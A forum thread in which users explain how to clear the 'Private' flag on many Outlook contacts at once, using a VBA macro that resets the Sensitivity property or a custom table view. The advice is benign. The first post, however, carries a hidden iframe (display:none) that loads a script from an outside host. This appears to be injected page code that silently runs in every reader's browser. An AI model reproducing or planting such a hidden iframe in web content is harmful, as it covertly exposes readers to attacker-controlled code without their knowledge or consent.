+ Reply to Thread

Outlook's private check box in contacts, HELP

I've posted this again here:

I noticed that some of my contacts for some reason have the check box marked to indicate that the contact is private. I realized that I can't make create a voice dial for a contact that is marked private. How can I change all of my contact to not have the check box marked all at once. I don't want to have to go through all my contacts to see which ones are marked and which ones aren't. Any suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Chris Mattix
    Personal Real Estate Consultant

Re: Outlook's private check box in contacts, HELP

Originally posted by mattixc
    I've posted this again here:

I noticed that some of my contacts for some reason have the check box marked to indicate that the contact is private. I realized that I can't make create a voice dial for a contact that is marked private. How can I change all of my contact to not have the check box marked all at once. I don't want to have to go through all my contacts to see which ones are marked and which ones aren't. Any suggestions?
    Are you using Outlook or Palm Desktop? It's pretty easy in Outlook to make changes to all contacts at one time (although sometimes I've had to export the data and do it outside of Outlook. Maybe there was an easier way, but that works). I don't believe you can make those kinds of global changes on the 7135 itself.
    Please visit my picture site: Robert-O-Rama :)

I use Outlook and I need to make to changes on Outlook and not the 7135. I can't figure out how to change all of the contacts in Outlook to NOT be checked as Private.

Thanks,
    Chris Mattix
    Personal Real Estate Consultant

Thought I remembered seeing a thread on this issue. I've noticed many of my records marked private as well so I searched for a solution. I found some documentation to fix this, but the webpage has since been removed, I located a cached webpage via google. I have followed the directions below, and it did correct my problem. These instructions are for Outlook 2000, I don't know if they will work with other versions of Outlook. This document has been edited slightly for length:

How can I reset a group of contacts so that they aren't marked Private?

A bug in the Office 2000 Small Business Customer Manager (part of the Small Business Tools included in the Office 2000 Premium, Professional, and Small Business suites) can cause Outlook to mark all contacts as Private.

Fixing them is easy with the Outlook 2000 Visual Basic for Applications (VBA) code. (In Outlook) press Alt+F11 to open the VBA window, then choose Insert, Module to add a new code module. In the Properties window, change the name from Module1 to something like basFixPrivateContacts. Add the (code contained in the following url) http://www.exchangeadmin.com/Files/0...Listing_01.txt In this code, the FixPrivateContacts subroutine checks that you're looking at a Contacts folder and have selected some items, then it hands off control to the DoFix subroutine. DoFix loops through the selected items and, for each contact, changes the Sensitivity property to Normal, which is what it would be if you manually cleared the Private check box on each item.

Follow these instructions to use the code:

Go to the Contacts folder.
    Create a Custom view, and group by the Sensitivity field.
    Click the group heading for Sensitivity: Private to select all the items marked Private.
    Hold down the Ctrl key, and click each contact that you want to keep Private.
    Press Alt+F8, or choose Tools, Macro, Macros.
    Select the FixPrivateContacts macro, then click Run.

The URL for the Google cached page is:
    http://216.239.39.104/search?q=cache...hl=en&ie=UTF-8

I've got this same problem. There isn't a more intuitive (i.e. built-in to Outlook) method for doing this?

My guess is there isn't. The directions are wordy, but it really takes only a few minutes if you follow them. I've not worked with VBA before today and I was able to solve my problem in under 5 minutes. Email me if I can be of any assistance.

falstaffpac

Alternative method for changing: In Outlook Contacts go the View menu, select Current View, Define Views, New View. Specify the New View as a table. In the following Dialog Box that allows field selection, click on Fields, in the bottom left drop down menu, select All Contact Fields. Private is one of the selections. Add it to the list, and remove all other non-pertinent fields (except name maybe).
    Then click OK, OK, and Apply View. The result will be a table with names and the private box showing. You can sort by the Privacy status by clicking on the column heading and uncheck the boxes by clicking on them. As you clear the box, the sort will move them - it looks like they're disappearing, but they're not. Return to normal view by View, Current View, Detailed Address Cards (or whatever other selection you like).
    Oxo

Originally posted by Oxojim
    Alternative method for changing: In Outlook Contacts go the View menu, select Current View, Define Views, New View. Specify the New View as a table. In the following Dialog Box that allows field selection, click on Fields, in the bottom left drop down menu, select All Contact Fields. Private is one of the selections. Add it to the list, and remove all other non-pertinent fields (except name maybe).
    Then click OK, OK, and Apply View. The result will be a table with names and the private box showing. You can sort by the Privacy status by clicking on the column heading and uncheck the boxes by clicking on them. As you clear the box, the sort will move them - it looks like they're disappearing, but they're not. Return to normal view by View, Current View, Detailed Address Cards (or whatever other selection you like).
    Oxojim, I thought of that too, but I was looking for a way that did not require 1,000+ clicks.